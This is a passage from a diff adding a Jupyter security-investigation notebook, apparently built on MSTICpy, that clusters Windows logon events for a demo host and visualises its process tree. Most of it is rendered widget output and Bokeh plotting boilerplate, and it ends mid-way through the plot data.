+       "        <table class='table_logon'><tr class='cell_logon'><td class='cell_logon'><b>Account: </b>timvic<br><b>Account Domain: </b>BlackHatDemoHos<br><b>Logon Time: </b>2020-07-10 18:27:49.790000+00:00<br><b>Logon type: </b>10(RemoteInteractive)<br><b>User Id/SID: </b>S-1-5-21-3334416894-4278249820-3875274378-1006<br>&nbsp;&nbsp;SID S-1-5-21-3334416894-4278249820-3875274378-1006 is local machine or domain account<br><br><b>Subject (source) account: </b>WORKGROUP/BlackHatDemoHos$<br><b>Logon process: </b>User32 <br><b>Authentication: </b>Negotiate<br><b>Source IpAddress: </b>174.127.235.80<br><b>Source Host: </b>BlackHatDemoHos<br><b>Logon status: </b><br></td></tr></table>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from msticpy.sectools.eventcluster import dbcluster_events, add_process_features, _string_score\n",
+    "\n",
+    "logon_features = host_logons.copy()\n",
+    "logon_features[\"AccountNum\"] = host_logons.apply(lambda x: _string_score(x.Account), axis=1)\n",
+    "logon_features[\"TargetUserNum\"] = host_logons.apply(lambda x: _string_score(x.TargetUserName), axis=1)\n",
+    "logon_features[\"LogonHour\"] = host_logons.apply(lambda x: x.TimeGenerated.hour, axis=1)\n",
+    "\n",
+    "# run clustering\n",
+    "(clus_logons, _, _) = dbcluster_events(data=logon_features, time_column=\"TimeGenerated\", cluster_columns=[\"AccountNum\", \"LogonType\", \"TargetUserNum\"], max_cluster_distance=0.0001)\n",
+    "\n",
+    "dist_logons = clus_logons.sort_values(\"TimeGenerated\")[[\"TargetUserName\", \"TimeGenerated\", \"LastEventTime\", \"LogonType\", \"ClusterSize\"]]\n",
+    "dist_logons = dist_logons.apply(lambda x: (\n",
+    "        f\"{x.TargetUserName}:    \"\n",
+    "        f\"(logontype {x.LogonType})   \"\n",
+    "        f\"timerange: {x.TimeGenerated} - {x.LastEventTime}    \"\n",
+    "        f\"count: {x.ClusterSize}\"\n",
+    "    ),\n",
+    "    axis=1,\n",
+    ")\n",
+    "dist_logons = {v: k for k, v in dist_logons.to_dict().items()}\n",
+    "\n",
+    "def show_logon(idx):\n",
+    "    return nbdisplay.format_logon(pd.DataFrame(clus_logons.loc[idx]).T)\n",
+    "\n",
+    "logon_wgt = nbwidgets.SelectItem(description=\"Select logon cluster to examine\", item_dict=dist_logons, action=show_logon,height=\"200px\", width=\"100%\", auto_display=True)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 29,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# We can reset our timeframe based on the selected cluster.\n",
+    "start = clus_logons.loc[logon_wgt.value]['FirstEventTime']\n",
+    "end = clus_logons.loc[logon_wgt.value]['LastEventTime']"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Process Tree\n",
+    "When investigating a host it is valuable to see the processes executed on the host, and the relationship between them. We can use the MSTICpy *ProcessTree* functionality to build and visualize [process trees](https://msticpy.readthedocs.io/en/latest/visualization/ProcessTree.html) from both Linux and Windows hosts.<br>\n",
+    "\n",
+    "> Due to the volume of data potentially involved when looking at process events, it's important to have a focused time frame to look at. We use the MSTICpy [widget for selecting a time range](https://msticpy.readthedocs.io/en/latest/visualization/NotebookWidgets.html?highlight=QueryTime#querytime)."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 30,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "f2b0885427204a6cae28ee535deffad6",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HTML(value='<h4>Set query time boundaries</h4>')"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "3f16bee4e7d04b058126c88807af615f",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(DatePicker(value=datetime.date(2020, 7, 10), description='Origin Date'), Text(value='18:27:49.7…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "8be6b1272f1d4b83a3bfca7f6c4b34e9",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(IntRangeSlider(value=(0, 3), description='Time Range (hour):', layout=Layout(width='80%'), max=…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "timescope = nbwidgets.QueryTime(units=\"hours\", origin_time = start, max_before=12, max_after=24, before=0, after=3, auto_display=True)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 31,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "f4ff41d5179647aabd325b0dfd2cb4d1",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(IntProgress(value=0, bar_style='info', description='Progress:'), Label(value='0%')))"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "{'Processes': 1164, 'RootProcesses': 14, 'LeafProcesses': 868, 'BranchProcesses': 282, 'IsolatedProcesses': 0, 'LargestTreeDepth': 6}\n"
+     ]
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "565b838107e4435c8075005957a1cc87",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<hr>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "proc_data = qry_prov.WindowsSecurity.list_host_processes(start=timescope.start,end=timescope.end, host_name=host_name)\n",
+    "p_tree = ptree.build_process_tree(proc_data, show_progress=True)\n",
+    "root_proc_sel = nbwidgets.SelectItem(\n",
+    "    description=\"Select root process to investigate process tree\",\n",
+    "    item_list=ptree.get_roots(p_tree)['NewProcessName'].to_list(),\n",
+    "    height=\"200px\",\n",
+    "    width=\"100%\",\n",
+    "    auto_display=True)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 33,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"4074\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(\"4074\");\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error() {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (var i = 0; i < css_urls.length; i++) {\n",
+       "      var url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n",
+       "\n",
+       "    for (var i = 0; i < js_urls.length; i++) {\n",
+       "      var url = js_urls[i];\n",
+       "      var element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    if (force === true) {\n",
+       "        display_loaded();\n",
+       "      }} else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(\"4074\")).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"4074\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"4074\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"bdbb6432-a369-4a7f-9597-02fa889ccf63\" data-root-id=\"4204\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "(function(root) {\n",
+       "  function embed_document(root) {\n",
+       "    \n",
+       "  var docs_json = {\"799438af-5e81-4052-a89f-44e91b100863\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"4189\"},{\"id\":\"4202\"}]},\"id\":\"4204\",\"type\":\"Column\"},{\"attributes\":{\"axis_line_color\":null,\"formatter\":{\"id\":\"4114\"},\"major_label_standoff\":0,\"major_tick_line_color\":\"navy\",\"ticker\":{\"id\":\"4143\"},\"visible\":false},\"id\":\"4088\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"4221\",\"type\":\"StringEditor\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"TimeGenerated\":\"datetime\"},\"renderers\":[{\"id\":\"4111\"}],\"tooltips\":[[\"Process\",\"@NewProcessName\"],[\"PID\",\"@PID\"],[\"CmdLine\",\"@CommandLine\"],[\"SubjUser\",\"@SubjectUserName\"],[\"SubjLgnId\",\"@SubjectLogonId\"],[\"TargLgnId\",\"@TargetLogonId\"],[\"Time\",\"@TimeGenerated{%F %T}\"]]},\"id\":\"4105\",\"type\":\"HoverTool\"},{\"attributes\":{},\"id\":\"4223\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"4224\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"4222\",\"type\":\"StringFormatter\"},{\"attributes\":{\"range\":{\"id\":\"4080\"},\"value\":1.75},\"id\":\"4107\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"4220\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"4219\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"4084\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"4225\",\"type\":\"StringEditor\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"4096\"},{\"id\":\"4097\"},{\"id\":\"4098\"},{\"id\":\"4099\"},{\"id\":\"4105\"}]},\"id\":\"4100\",\"type\":\"Toolbar\"},{\"attributes\":{\"end\":54,\"start\":33},\"id\":\"4082\",\"type\":\"Range1d\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"4170\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"4167\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"4168\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"4086\",\"type\":\"LinearScale\"},{\"attributes\":{\"data_source\":{\"id\":\"4075\"},\"glyph\":{\"id\":\"4180\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4181\"},\"selection_glyph\":null,\"view\":{\"id\":\"4183\"}},\"id\":\"4182\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"overlay\":{\"id\":\"4185\"},\"x_range\":null,\"y_range\":{\"id\":\"4082\"}},\"id\":\"4184\",\"type\":\"RangeTool\"},{\"attributes\":{\"text\":\"ProcessTree\"},\"id\":\"4078\",\"type\":\"Title\"},{\"attributes\":{\"source\":{\"id\":\"4075\"}},\"id\":\"4183\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"4076\"}},\"